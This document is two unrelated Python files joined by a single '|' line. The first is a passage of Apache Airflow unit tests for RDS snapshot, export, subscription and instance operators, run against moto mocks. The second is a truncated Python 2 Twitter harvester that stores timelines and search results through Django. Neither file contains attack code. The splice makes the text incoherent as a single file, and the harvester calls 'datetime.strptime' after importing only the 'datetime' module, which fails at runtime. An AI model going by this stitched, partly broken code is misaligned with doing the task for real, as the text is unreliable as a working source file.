db_type="instance",
source_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
target_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT_COPY,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
instance_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT_COPY)
instance_snapshots = result.get("DBSnapshots")
assert instance_snapshots
assert len(instance_snapshots) == 1
mock_await_status.assert_not_called()
@mock_rds
def test_copy_db_cluster_snapshot(self):
_create_db_cluster(self.hook)
_create_db_cluster_snapshot(self.hook)
cluster_snapshot_operator = RdsCopyDbSnapshotOperator(
task_id="test_cluster",
db_type="cluster",
source_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
target_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT_COPY,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
cluster_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT_COPY
)
cluster_snapshots = result.get("DBClusterSnapshots")
assert cluster_snapshots
assert len(cluster_snapshots) == 1
@mock_rds
@patch.object(RdsHook, "wait_for_db_snapshot_state")
def test_copy_db_cluster_snapshot_no_wait(self, mock_await_status):
_create_db_cluster(self.hook)
_create_db_cluster_snapshot(self.hook)
cluster_snapshot_operator = RdsCopyDbSnapshotOperator(
task_id="test_cluster_no_wait",
db_type="cluster",
source_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
target_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT_COPY,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
cluster_snapshot_operator.execute(None)
result = self.hook.conn.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT_COPY
)
cluster_snapshots = result.get("DBClusterSnapshots")
assert cluster_snapshots
assert len(cluster_snapshots) == 1
mock_await_status.assert_not_called()
class TestRdsDeleteDbSnapshotOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_delete_db_instance_snapshot(self):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
instance_snapshot_operator = RdsDeleteDbSnapshotOperator(
task_id="test_instance",
db_type="instance",
db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
with patch.object(instance_snapshot_operator.hook, "wait_for_db_snapshot_state") as mock_wait:
instance_snapshot_operator.execute(None)
mock_wait.assert_called_once_with(DB_INSTANCE_SNAPSHOT, target_state="deleted")
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
@mock_rds
def test_delete_db_instance_snapshot_no_wait(self):
"""
Check that the operator does not wait for the DB instance snapshot delete operation to complete when
wait_for_completion=False
"""
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
instance_snapshot_operator = RdsDeleteDbSnapshotOperator(
task_id="test_delete_db_instance_snapshot_no_wait",
db_type="instance",
db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(instance_snapshot_operator.hook)
with patch.object(instance_snapshot_operator.hook, "wait_for_db_snapshot_state") as mock_wait:
instance_snapshot_operator.execute(None)
mock_wait.assert_not_called()
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
@mock_rds
def test_delete_db_cluster_snapshot(self):
_create_db_cluster(self.hook)
_create_db_cluster_snapshot(self.hook)
cluster_snapshot_operator = RdsDeleteDbSnapshotOperator(
task_id="test_cluster",
db_type="cluster",
db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
with patch.object(cluster_snapshot_operator.hook, "wait_for_db_cluster_snapshot_state") as mock_wait:
cluster_snapshot_operator.execute(None)
mock_wait.assert_called_once_with(DB_CLUSTER_SNAPSHOT, target_state="deleted")
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
@mock_rds
def test_delete_db_cluster_snapshot_no_wait(self):
"""
Check that the operator does not wait for the DB cluster snapshot delete operation to complete when
wait_for_completion=False
"""
_create_db_cluster(self.hook)
_create_db_cluster_snapshot(self.hook)
cluster_snapshot_operator = RdsDeleteDbSnapshotOperator(
task_id="test_delete_db_cluster_snapshot_no_wait",
db_type="cluster",
db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(cluster_snapshot_operator.hook)
with patch.object(cluster_snapshot_operator.hook, "wait_for_db_cluster_snapshot_state") as mock_wait:
cluster_snapshot_operator.execute(None)
mock_wait.assert_not_called()
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
class TestRdsStartExportTaskOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_start_export_task(self):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
start_export_operator = RdsStartExportTaskOperator(
task_id="test_start",
export_task_identifier=EXPORT_TASK_NAME,
source_arn=EXPORT_TASK_SOURCE,
iam_role_arn=EXPORT_TASK_ROLE_ARN,
kms_key_id=EXPORT_TASK_KMS,
s3_bucket_name=EXPORT_TASK_BUCKET,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(start_export_operator.hook)
start_export_operator.execute(None)
result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
export_tasks = result.get("ExportTasks")
assert export_tasks
assert len(export_tasks) == 1
assert export_tasks[0]["Status"] == "complete"
@mock_rds
@patch.object(RdsHook, "wait_for_export_task_state")
def test_start_export_task_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
start_export_operator = RdsStartExportTaskOperator(
task_id="test_start_no_wait",
export_task_identifier=EXPORT_TASK_NAME,
source_arn=EXPORT_TASK_SOURCE,
iam_role_arn=EXPORT_TASK_ROLE_ARN,
kms_key_id=EXPORT_TASK_KMS,
s3_bucket_name=EXPORT_TASK_BUCKET,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(start_export_operator.hook)
start_export_operator.execute(None)
result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
export_tasks = result.get("ExportTasks")
assert export_tasks
assert len(export_tasks) == 1
assert export_tasks[0]["Status"] == "complete"
mock_await_status.assert_not_called()
class TestRdsCancelExportTaskOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_cancel_export_task(self):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
_start_export_task(self.hook)
cancel_export_operator = RdsCancelExportTaskOperator(
task_id="test_cancel",
export_task_identifier=EXPORT_TASK_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(cancel_export_operator.hook)
cancel_export_operator.execute(None)
result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
export_tasks = result.get("ExportTasks")
assert export_tasks
assert len(export_tasks) == 1
assert export_tasks[0]["Status"] == "canceled"
@mock_rds
@patch.object(RdsHook, "wait_for_export_task_state")
def test_cancel_export_task_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
_create_db_instance_snapshot(self.hook)
_start_export_task(self.hook)
cancel_export_operator = RdsCancelExportTaskOperator(
task_id="test_cancel_no_wait",
export_task_identifier=EXPORT_TASK_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(cancel_export_operator.hook)
cancel_export_operator.execute(None)
result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
export_tasks = result.get("ExportTasks")
assert export_tasks
assert len(export_tasks) == 1
assert export_tasks[0]["Status"] == "canceled"
mock_await_status.assert_not_called()
class TestRdsCreateEventSubscriptionOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_create_event_subscription(self):
_create_db_instance(self.hook)
create_subscription_operator = RdsCreateEventSubscriptionOperator(
task_id="test_create",
subscription_name=SUBSCRIPTION_NAME,
sns_topic_arn=SUBSCRIPTION_TOPIC,
source_type="db-instance",
source_ids=[DB_INSTANCE_NAME],
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(create_subscription_operator.hook)
create_subscription_operator.execute(None)
result = self.hook.conn.describe_event_subscriptions(SubscriptionName=SUBSCRIPTION_NAME)
subscriptions = result.get("EventSubscriptionsList")
assert subscriptions
assert len(subscriptions) == 1
assert subscriptions[0]["Status"] == "active"
@mock_rds
@patch.object(RdsHook, "wait_for_event_subscription_state")
def test_create_event_subscription_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
create_subscription_operator = RdsCreateEventSubscriptionOperator(
task_id="test_create_no_wait",
subscription_name=SUBSCRIPTION_NAME,
sns_topic_arn=SUBSCRIPTION_TOPIC,
source_type="db-instance",
source_ids=[DB_INSTANCE_NAME],
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(create_subscription_operator.hook)
create_subscription_operator.execute(None)
result = self.hook.conn.describe_event_subscriptions(SubscriptionName=SUBSCRIPTION_NAME)
subscriptions = result.get("EventSubscriptionsList")
assert subscriptions
assert len(subscriptions) == 1
assert subscriptions[0]["Status"] == "active"
mock_await_status.assert_not_called()
class TestRdsDeleteEventSubscriptionOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_delete_event_subscription(self):
_create_event_subscription(self.hook)
delete_subscription_operator = RdsDeleteEventSubscriptionOperator(
task_id="test_delete",
subscription_name=SUBSCRIPTION_NAME,
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(delete_subscription_operator.hook)
delete_subscription_operator.execute(None)
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_event_subscriptions(SubscriptionName=EXPORT_TASK_NAME)
class TestRdsCreateDbInstanceOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_create_db_instance(self):
create_db_instance_operator = RdsCreateDbInstanceOperator(
task_id="test_create_db_instance",
db_instance_identifier=DB_INSTANCE_NAME,
db_instance_class="db.m5.large",
engine="postgres",
rds_kwargs={
"DBName": DB_INSTANCE_NAME,
},
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(create_db_instance_operator.hook)
create_db_instance_operator.execute(None)
result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
db_instances = result.get("DBInstances")
assert db_instances
assert len(db_instances) == 1
assert db_instances[0]["DBInstanceStatus"] == "available"
@mock_rds
@patch.object(RdsHook, "wait_for_db_instance_state")
def test_create_db_instance_no_wait(self, mock_await_status):
create_db_instance_operator = RdsCreateDbInstanceOperator(
task_id="test_create_db_instance_no_wait",
db_instance_identifier=DB_INSTANCE_NAME,
db_instance_class="db.m5.large",
engine="postgres",
rds_kwargs={
"DBName": DB_INSTANCE_NAME,
},
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(create_db_instance_operator.hook)
create_db_instance_operator.execute(None)
result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
db_instances = result.get("DBInstances")
assert db_instances
assert len(db_instances) == 1
assert db_instances[0]["DBInstanceStatus"] == "available"
mock_await_status.assert_not_called()
class TestRdsDeleteDbInstanceOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_delete_db_instance(self):
_create_db_instance(self.hook)
delete_db_instance_operator = RdsDeleteDbInstanceOperator(
task_id="test_delete_db_instance",
db_instance_identifier=DB_INSTANCE_NAME,
rds_kwargs={
"SkipFinalSnapshot": True,
},
aws_conn_id=AWS_CONN,
dag=self.dag,
)
_patch_hook_get_connection(delete_db_instance_operator.hook)
delete_db_instance_operator.execute(None)
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
@mock_rds
@patch.object(RdsHook, "wait_for_db_instance_state")
def test_delete_db_instance_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
delete_db_instance_operator = RdsDeleteDbInstanceOperator(
task_id="test_delete_db_instance_no_wait",
db_instance_identifier=DB_INSTANCE_NAME,
rds_kwargs={
"SkipFinalSnapshot": True,
},
aws_conn_id=AWS_CONN,
dag=self.dag,
wait_for_completion=False,
)
_patch_hook_get_connection(delete_db_instance_operator.hook)
delete_db_instance_operator.execute(None)
with pytest.raises(self.hook.conn.exceptions.ClientError):
self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
mock_await_status.assert_not_called()
class TestRdsStopDbOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
@patch.object(RdsHook, "wait_for_db_instance_state")
def test_stop_db_instance(self, mock_await_status):
_create_db_instance(self.hook)
stop_db_instance = RdsStopDbOperator(task_id="test_stop_db_instance", db_identifier=DB_INSTANCE_NAME)
_patch_hook_get_connection(stop_db_instance.hook)
stop_db_instance.execute(None)
result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
status = result["DBInstances"][0]["DBInstanceStatus"]
assert status == "stopped"
mock_await_status.assert_called()
@mock_rds
@patch.object(RdsHook, "wait_for_db_instance_state")
def test_stop_db_instance_no_wait(self, mock_await_status):
_create_db_instance(self.hook)
stop_db_instance = RdsStopDbOperator(
task_id="test_stop_db_instance_no_wait", db_identifier=DB_INSTANCE_NAME, wait_for_completion=False
)
_patch_hook_get_connection(stop_db_instance.hook)
stop_db_instance.execute(None)
result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
status = result["DBInstances"][0]["DBInstanceStatus"]
assert status == "stopped"
mock_await_status.assert_not_called()
@mock.patch.object(RdsHook, "conn")
def test_deferred(self, conn_mock):
op = RdsStopDbOperator(
task_id="test_stop_db_instance_no_wait",
db_identifier=DB_INSTANCE_NAME,
deferrable=True,
)
with pytest.raises(TaskDeferred) as defer:
op.execute({})
assert isinstance(defer.value.trigger, RdsDbStoppedTrigger)
@mock_rds
def test_stop_db_instance_create_snapshot(self):
_create_db_instance(self.hook)
stop_db_instance = RdsStopDbOperator(
task_id="test_stop_db_instance_create_snapshot",
db_identifier=DB_INSTANCE_NAME,
db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
)
_patch_hook_get_connection(stop_db_instance.hook)
stop_db_instance.execute(None)
describe_result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
status = describe_result["DBInstances"][0]["DBInstanceStatus"]
assert status == "stopped"
snapshot_result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
instance_snapshots = snapshot_result.get("DBSnapshots")
assert instance_snapshots
assert len(instance_snapshots) == 1
@mock_rds
@patch.object(RdsHook, "wait_for_db_cluster_state")
def test_stop_db_cluster(self, mock_await_status):
_create_db_cluster(self.hook)
stop_db_cluster = RdsStopDbOperator(
task_id="test_stop_db_cluster", db_identifier=DB_CLUSTER_NAME, db_type="cluster"
)
_patch_hook_get_connection(stop_db_cluster.hook)
stop_db_cluster.execute(None)
describe_result = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
status = describe_result["DBClusters"][0]["Status"]
assert status == "stopped"
mock_await_status.assert_called()
@mock_rds
def test_stop_db_cluster_create_snapshot_logs_warning_message(self, caplog):
_create_db_cluster(self.hook)
stop_db_cluster = RdsStopDbOperator(
task_id="test_stop_db_cluster",
db_identifier=DB_CLUSTER_NAME,
db_type="cluster",
db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
)
_patch_hook_get_connection(stop_db_cluster.hook)
with caplog.at_level(logging.WARNING, logger=stop_db_cluster.log.name):
stop_db_cluster.execute(None)
warning_message = (
"'db_snapshot_identifier' does not apply to db clusters. Remove it to silence this warning."
)
assert warning_message in caplog.text
class TestRdsStartDbOperator:
@classmethod
def setup_class(cls):
cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
_patch_hook_get_connection(cls.hook)
@classmethod
def teardown_class(cls):
del cls.dag
del cls.hook
@mock_rds
def test_start_db_instance(self):
_create_db_instance(self.hook)
self.hook.conn.stop_db_instance(DBInstanceIdentifier=DB_INSTANCE_NAME)
result_before = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
status_before = result_before["DBInstances"][0]["DBInstanceStatus"]
assert status_before == "stopped"
start_db_instance = RdsStartDbOperator(
task_id="test_start_db_instance", db_identifier=DB_INSTANCE_NAME
)
_patch_hook_get_connection(start_db_instance.hook)
start_db_instance.execute(None)
result_after = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
status_after = result_after["DBInstances"][0]["DBInstanceStatus"]
assert status_after == "available"
@mock_rds
def test_start_db_cluster(self):
_create_db_cluster(self.hook)
self.hook.conn.stop_db_cluster(DBClusterIdentifier=DB_CLUSTER_NAME)
result_before = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
status_before = result_before["DBClusters"][0]["Status"]
assert status_before == "stopped"
start_db_cluster = RdsStartDbOperator(
task_id="test_start_db_cluster", db_identifier=DB_CLUSTER_NAME, db_type="cluster"
)
_patch_hook_get_connection(start_db_cluster.hook)
start_db_cluster.execute(None)
result_after = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
status_after = result_after["DBClusters"][0]["Status"]
assert status_after == "available"
@mock.patch.object(RdsHook, "conn")
def test_deferred(self, conn_mock):
op = RdsStartDbOperator(
task_id="test_stop_db_instance_no_wait",
db_identifier=DB_INSTANCE_NAME,
deferrable=True,
)
with pytest.raises(TaskDeferred) as defer:
op.execute({})
assert isinstance(defer.value.trigger, RdsDbAvailableTrigger)
|
# coding=UTF-8
import twitter
import time
import datetime
import urllib
from twython.twython import TwythonError, TwythonAPILimit, TwythonAuthError, TwythonRateLimitError
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from snh.models.twittermodel import *
import snhlogger
logger = snhlogger.init_logger(__name__, "twitter.log")
def run_twitter_harvester():
harvester_list = TwitterHarvester.objects.all()
for harvester in harvester_list:
harvester.update_client_stats()
logger.info(u"The harvester %s is %s" %
(unicode(harvester),
"active" if harvester.is_active else "inactive"))
if harvester.is_active and not harvester.remaining_hits > 0:
logger.warning(u"The harvester %s is %s but has exceeded the rate limit. Need to wait? %s" %
(unicode(harvester),
"active" if harvester.is_active else "inactive",
harvester.get_stats()))
if harvester.is_active and harvester.remaining_hits > 0:
run_harvester_v2(harvester)
if harvester.is_active:
run_harvester_search(harvester)
def get_latest_statuses_page(harvester, user, page):
since_max = [u"since_id", None]
if user.was_aborted and user.last_harvested_status:
since_max = [u"max_id",user.last_harvested_status.fid]
latest_statuses_page = harvester.api_call("GetUserTimeline",
{
u"screen_name":unicode(user.screen_name),
since_max[0]:since_max[1],
u"include_rts":True,
u"include_entities":True,
u"count":200,
u"page":page,
})
return latest_statuses_page
def sleeper(retry_count):
retry_delay = 1
wait_delay = retry_count*retry_delay
wait_delay = 60 if wait_delay > 60 else wait_delay
time.sleep(wait_delay)
def manage_exception(retry_count, harvester, user, page):
msg = u"Exception for the harvester %s for %s at page %d. Retry:%d" % (harvester, unicode(user), page, retry_count)
logger.exception(msg)
retry_count += 1
return (retry_count, retry_count > harvester.max_retry_on_fail)
def manage_twitter_exception(retry_count, harvester, user, page, tex):
retry_count += 1
need_a_break = retry_count > harvester.max_retry_on_fail
if unicode(tex) == u"Not found":
user.error_triggered = True
user.save()
need_a_break = True
msg = u"Exception for the harvester %s for %s at page %d. Retry:%d. The user does not exists!" % (harvester, unicode(user), page, retry_count)
logger.exception(msg)
elif unicode(tex) == u"Capacity Error":
logger.debug(u"%s:%s:%d. Capacity Error. Retrying." % (harvester, unicode(user), page))
elif unicode(tex).startswith(u"Rate limit exceeded"):
harvester.update_client_stats()
msg = u"Exception for the harvester %s for %s at page %d. Retry:%d." % (harvester, unicode(user), page, retry_count)
logger.exception(msg)
raise
elif unicode(tex) == u"{u'error': u'Invalid query'}" or unicode(tex) == u"Invalid query":
logger.debug(u"%s:%s:%d. Invalid query. Breaking." % (harvester, unicode(user), page))
need_a_break = True
else:
print tex
msg = u"Exception for the harvester %s for %s at page %d. Retry:%d. %s" % (harvester, unicode(user), page, retry_count, tex)
logger.exception(msg)
return (retry_count, need_a_break)
def get_latest_statuses(harvester, user):
page = 1
retry = 0
lsp = []
latest_statuses = []
too_old = False
while not too_old:
try:
logger.debug(u"%s:%s(%d):%d" % (harvester, unicode(user), user.fid if user.fid else 0, page))
lsp = get_latest_statuses_page(harvester, user, page)
if len(lsp) != 0:
for status in lsp:
status_time = datetime.strptime(status.created_at,'%a %b %d %H:%M:%S +0000 %Y')
if status_time > harvester.harvest_window_from and \
status_time < harvester.harvest_window_to:
update_user_status(status, user)
if status_time < harvester.harvest_window_from:
too_old = True
break
else:
break
page = page + 1
retry = 0
except twitter.TwitterError, tex:
(retry, need_a_break) = manage_twitter_exception(retry, harvester, user, page, tex)
if need_a_break:
break
else:
sleeper(retry)
except:
(retry, need_a_break) = manage_exception(retry, harvester, user, page)
if need_a_break:
break
else:
sleeper(retry)
return latest_statuses
def update_user_status(status, user):
try:
try:
tw_status = TWStatus.objects.get(fid__exact=status.id)
except ObjectDoesNotExist:
tw_status = TWStatus(user=user)
tw_status.save()
tw_status.update_from_twitter(status,user)
user.last_harvested_status = tw_status
user.save()
except:
msg = u"Cannot update status %s for %s:(%d)" % (unicode(status), unicode(user), user.fid if user.fid else 0)
logger.exception(msg)
def get_existing_user(param):
user = None
try:
user = TWUser.objects.get(**param)
except MultipleObjectsReturned:
user = TWUser.objects.filter(**param)[0]
logger.warning(u"Duplicated user in DB! %s, %s" % (user, user.fid))
except ObjectDoesNotExist:
pass
return user
def status_from_search(harvester, tw_status):
user = None
snh_status = None
try:
user = get_existing_user({"fid__exact":tw_status["from_user_id"]})
if not user:
user = get_existing_user({"screen_name__exact":tw_status["from_user"]})
if not user:
user = TWUser(
fid=tw_status["from_user_id"],
screen_name=tw_status["from_user"],
)
user.save()
logger.info(u"New user created in status_from_search! %s", user)
try:
snh_status = TWStatus.objects.get(fid__exact=tw_status["id"])
except ObjectDoesNotExist:
snh_status = TWStatus(
fid=tw_status["id"],
user=user,
)
snh_status.save()
snh_status.update_from_rawtwitter(tw_status, user)
except:
msg = u"Cannot update status %s for user %s:%s)" % (unicode(tw_status), unicode(tw_status["from_user"]),unicode(tw_status["from_user_id"]))
logger.exception(msg)
return snh_status
def update_search(snh_search, snh_status):
if snh_status and snh_search.status_list.filter(fid__exact=snh_status.fid).count() == 0:
snh_search.status_list.add(snh_status)
snh_search.latest_status_harvested = snh_status
snh_search.save()
def call_search(harvester, term, page, since_id=None):
retry = 0
status_list = None
next_page = True
while status_list is None:
try:
uniterm = urllib.urlencode({"k":term.encode('utf-8')}).split("=")[1:][0]
params = { u"parameters":{
u"q":uniterm,
u"since_id":since_id,
u"rpp":u"100",
u"page":u"%d" % page,
u"include_rts":u"true",
u"include_entities":u"true",
}
}
logger.info(u"Getting new page:%d retry:%d, params:%s" % (page,retry,params))
data = harvester.api_call(u"GetPlainSearch", params)
if "results" in data:
status_list = data["results"]
except twitter.TwitterError, tex:
(retry, need_a_break) = manage_twitter_exception(retry, harvester, term, page, tex)
if need_a_break:
status_list = []
break
else:
sleeper(retry)
logger.info(u"Next page for %s: %s Hits to go: %d, len:%d" % (term, harvester, harvester.remaining_hits,len(status_list)))
return status_list, next_page
def search_term(harvester, twsearch):
page = 1
too_old = False
since_id = None
if twsearch.latest_status_harvested is not None:
since_id = unicode(twsearch.latest_status_harvested.fid)
status_list, next_page = call_search(harvester, twsearch.term, page, since_id)
while status_list and not too_old:
page += 1
for status in status_list:
status_time = datetime.strptime(status["created_at"],'%a, %d %b %Y %H:%M:%S +0000')
if status_time > harvester.harvest_window_from and \
status_time < harvester.harvest_window_to:
snh_status = status_from_search(harvester, status)
update_search(twsearch, snh_status)
if status_time < harvester.harvest_window_from or not next_page:
too_old = True
break
logger.info(u"last status date: %s" % status_time)
if next_page:
status_list, next_page = call_search(harvester, twsearch.term, page, since_id)
def para_search_term(harvester, all_twsearch):
searches = []
for twsearch in all_twsearch:
since_id = None
if twsearch.latest_status_harvested is not None:
since_id = unicode(twsearch.latest_status_harvested.fid)
searches.append({
"twsearch":twsearch,
"page":1,
"has_more":True,
"since_id":since_id,
})
new_page_in_the_box = True
while new_page_in_the_box:
new_page_in_the_box = False
for search in searches:
if search["has_more"]:
new_page_in_the_box = True
logger.info(u"Will search for %s at page %d, since_id:%s" % (search["twsearch"].term, search["page"], search["since_id"]))
status_list, has_more = call_search(harvester, search["twsearch"].term, search["page"], search["since_id"])
search["page"] += 1
search["has_more"] = has_more
status_time = None
for status in status_list:
status_time = datetime.strptime(status["created_at"],'%a, %d %b %Y %H:%M:%S +0000')
if status_time > harvester.harvest_window_from and \
status_time < harvester.harvest_window_to:
snh_status = status_from_search(harvester, status)
update_search(search["twsearch"], snh_status)
if status_time < harvester.harvest_window_from:
search["has_more"] = False
break
if status_time is None or len(status_list) == 0:
search["has_more"] = False
logger.info(u"last status date: %s" % status_time)
def update_user_twython(twuser, user):
try:
user.update_from_rawtwitter(twuser,twython=True)
except:
msg = u"Cannot update user info for %s:(%d)" % (unicode(twuser), user.fid if user.fid else 0)
logger.exception(msg)
def update_users_twython(harvester):
all_users = harvester.twusers_to_harvest.all()
screen_names = []
user_screen_name = {}
for user in all_users:
screen_names.append(user.screen_name)
user_screen_name[user.screen_name.upper()] = user
step_size = 100
split_screen_names = [screen_names[i:i+step_size] for i in range(0, len(screen_names), step_size)]
for screen_names in split_screen_names:
tt = harvester.get_tt_client()
twuser_list_page = tt.bulkUserLookup(screen_names=screen_names, include_entities="true")
logger.info(u"Twython hit to go: %d" % (tt.getRateLimitStatus()["remaining_hits"]))
for twuser in twuser_list_page:
screen_name = twuser["screen_name"].upper()
user = user_screen_name[screen_name]
update_user_twython(twuser, user)
def run_harvester_v2(harvester):
harvester.start_new_harvest()
logger.info(u"START REST: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
try:
if True:
update_users_twython(harvester)
if True:
user = harvester.get_next_user_to_harvest()
while user and harvester.remaining_hits > 0:
if not user.error_triggered:
logger.info(u"Start: %s:%s(%d). Hits to go: %d" % (harvester, unicode(user), user.fid if user.fid else 0, harvester.remaining_hits))
get_latest_statuses(harvester, user)
else:
logger.info(u"Skipping: %s:%s(%d) because user has triggered the error flag." % (harvester, unicode(user), user.fid if user.fid else 0))
user.was_aborted = False
user.save()
user = harvester.get_next_user_to_harvest()
except twitter.TwitterError:
harvester.update_client_stats()
finally:
